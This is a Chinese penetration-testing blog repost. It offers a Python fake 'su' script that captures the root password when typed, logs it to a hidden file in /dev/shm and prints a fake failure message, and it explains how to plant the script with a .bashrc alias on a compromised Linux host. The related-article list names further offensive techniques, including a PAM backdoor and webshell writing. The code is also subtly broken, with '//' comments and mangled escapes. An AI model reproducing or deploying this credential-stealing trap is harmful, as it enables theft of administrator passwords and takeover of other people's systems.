记录root密码小工具

最新推荐文章于 2023-01-10 14:09:52 发布
最新推荐文章于 2023-01-10 14:09:52 发布
阅读量219 收藏 1
点赞数
分类专栏: 渗透技巧 文章标签: 记录root密码工具
我希望自己永远怀着一颗学习的心!
本文链接:https://blog.csdn.net/q1352483315/article/details/95534640
版权 
#!/usr/bin/python

import os, sys, getpass, time

 

current_time = time.strftime("%Y-%m-%d %H:%M")

logfile="/dev/shm/.su.log"              //密码获取后记录在这里

#CentOS                

#fail_str = "su: incorrect password"

#Ubuntu              

#fail_str = "su: Authentication failure"

#For Linux Korea                    //centos,ubuntu,korea 切换root用户失败提示不一样

fail_str = "su: incorrect password"

try:

    passwd = getpass.getpass(prompt='Password: ');

    file=open(logfile,'a')

    file.write("[%s]t%s"%(passwd, current_time))   //截取root密码

    file.write('n')

    file.close()

except:

    pass

time.sleep(1)

print fail_str                               //打印切换root失败提示

渗透linux拿到低权限并提权无果时,将这个程序传上去,再将一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py’; 低权限用户su root 后 成功记录密码。密码记录路径请看脚本

转载:https://www.cnblogs.com/h4ck0ne/p/5154652.html

小鱼儿waha
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpStudy工具集成JDK+tomcat+Apache+mysql.rar
08-06
3、MySQL数据库默认用户名:root密码root,安装后请重新设置密码。 自带FTP服务器,支持多用户,无需再安装FTP服务器。自带网站挂马监视器,随时记录文件的修改情况,让挂马文件无处可逃。 6、本程序完美支持II7...
破解root密码root密码忘记怎么破解、给单用户模式创建密码
最新发布
2301_79996063的博客
12-09 608
会在上一个的时候 创建一个密码作为密保 防止 黑客入侵。这一步,手速要快,姿势要帅 选择第一个 按 e。然后 ctrl + x 进入下一步。生成groub 文件。
root密码算号,root账号默认密码
h3255031的博客
01-10 2028
需要注意的是,root用户是系统中唯一的超级管理员,它具有等同于操作系统的权限。允许拥有这些账户的用户同时登录这台计算机,这就涉及到计算机用户和资源的管理,GNU/Linux/Android的root帐号具有系统的所有权限,root密码的泄漏会导致整台计算机被完全地非法控制,所以root帐号在服务器上以及重要机器上是不允许直接使用的。root具有系统的所有权限,root密码的不小心泄漏,足以导致整台计算机完全被窃取root密码的人所控制,这台计算机上的任何用户的任何数据,都会赤裸在root的目光之下。
linux设置root密码
清风随心
05-16 4526
刚安装完的Linux系统是没有设置root用户密码的,默认的root密码在每次系统重启后都是随机生成的。下面我们手动进行操作修改root密码。在终端中输入:sudo passwd或者sudo passwd root,然后根据提示输入 新的密码即可(可直接修改为系统的登录密码,这样既方便又不易忘记)。 ...
linux下记录su密码的代码
weixin_33906657的博客
01-05 355
/* * kpr-fakesu.c V0.9beta167 ;P * by koper <[email protected]> * * Setting up: * admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c * admin@host:~$ mv .su /var/tmp/.su * adm...
periscope:网页预览和分析工具
05-14
Periscope是一个实用工具,可用于在不使用您自己的浏览器的情况下收集有关URL的信息。 使用 ,Chromium无头即可访问该站点,并记录所有由此产生的请求和响应。 此外,它使用“识别来识别潜在的浏览器指纹识别。 潜望...
Screen-Recorder:Android 屏幕录像机,无需 Root 设备
06-02
工具需要 root 或使用 ADB 接口,因为通过 ADB 接口启动的进程具有 AID_GRAPHICS 权限。 使用后一种方法,非特权应用程序可以连接到特权服务器来进行记录工具可以分为以下几类: 仅限根的帧缓冲区记录器应用...
TruClient Lite的铬「HPE 」「TruClient Lite for Chrome」-crx插件
03-09
打开终止,执行以下命令行,在询问时输入root用户密码。 sudo mkdir -p -m'+ rwx'/Users/$USER/Applications/TCLiteChrome.app/Contents/MacOS/; cd /Users/$USER/Applications/TCLiteChrome.app/Contents/MacOS/; ...
SSHapendoes:捕获不存在和已禁用帐户的登录尝试密码
02-17
密码列表是元数据的另一个关键部分,但是通常不会记录尝试输入的密码。 此工具公开攻击者尝试的密码,而不会公开合法用户帐户的密码。 背景 在使用研究攻击者的行为时,我注意到不同的攻击者会攻击不同的用户列表,...
密码管理小工具
04-19
NULL 博文链接:https://joeyjoker.iteye.com/blog/1880227
windows万能小工具组合(解压密码:1)
12-16
这是一些工具集合,可以帮你解决软件、硬件、网络上的好多问题,如果你是做哪个公司网络维护工作的,这东西定会帮上大忙!
linux下记录su密码
weixin_30898109的博客
08-27 151
/* * kpr-fakesu.c V0.9beta167 ;P * by koper <[email protected]> * * Setting up: * admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c * admin@host:~$ mv .su /var/tmp/.su * admin@host:...
linux万能密码,Linux pam 后门纪录root用户密码以及设置万能密码登录root
weixin_42451611的博客
04-29 705
最近看了一下有关Linux pam后门相关的知识点,发现有一些坑,便记录一下本次用的机器为Ubuntu16.04一、查看本机pam版本dpkg -l | grep pam可以看到pam的版本为1.1.8二、下载对应版本的pamwget http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gztar -zxvf Linux-PAM-1.1.8.t...
Linux 忘记root密码记录
weixin_33859665的博客
05-08 186
2019独角兽企业重金招聘Python工程师标准>>> ...
Windows远程执行cmd命令的方法
热门推荐
https://www.cnblogs.com/zpchcbd/
04-15 3万+
觉得对自己有用 于是就记录下来了 WMI执行命令(普通权限可以进行hash传递): 无回显执行:wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>c:\result.txt" 利用wmiexec工具配合进行反弹半交互shell:cscript.e...
BurpSuite解决爆破时候全是302的方法
https://www.cnblogs.com/zpchcbd/
09-16 8314
有时候爆破会遇到多个302跳转BurpSuite有一个设置可以跟随跳转 这样子设置了 burp就会跟到302跳转的界面 返回不同的页面长度 以此来进行判断
总结下写phpmyadmin写shell的方法
https://www.cnblogs.com/zpchcbd/
03-29 5866
导出WebShell主要条件: 1.Root数据库用户(root权限) 2.网站绝对路径(确定有写入权限) 3.magic_quotes_gpc:Off(关闭) 导出WebShell其它条件: 1.magic_quotes_gpc:开启时,会对’单引号进行转义,使其变成“\”反斜杠。 2.secure_file_priv:此配置项用来完成对数据导入导出的限制,如允许导入导出到指定目录。 3.fil...
windows获取RDP连接记录
https://www.cnblogs.com/zpchcbd/
08-26 5683
0x01 获取RDP连接历史记录: 以下代码为3gStudent实现的获取连接记录的代码: <# .SYNOPSIS This script will list the logged-in users' RDP Connections History. Author: 3gstudent@3gstudent License: BSD 3-Clause #> $AllUser = Get...
ubuntu root密码修改记录
11-22
同时,用户也可以通过命令行工具查看root密码修改记录。可以使用以下命令来查看root密码的修改记录: ``` sudo cat /var/log/auth.log | grep "passwd" ``` 这条命令将会在auth.log文件中筛选出包含"passwd"关键字的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值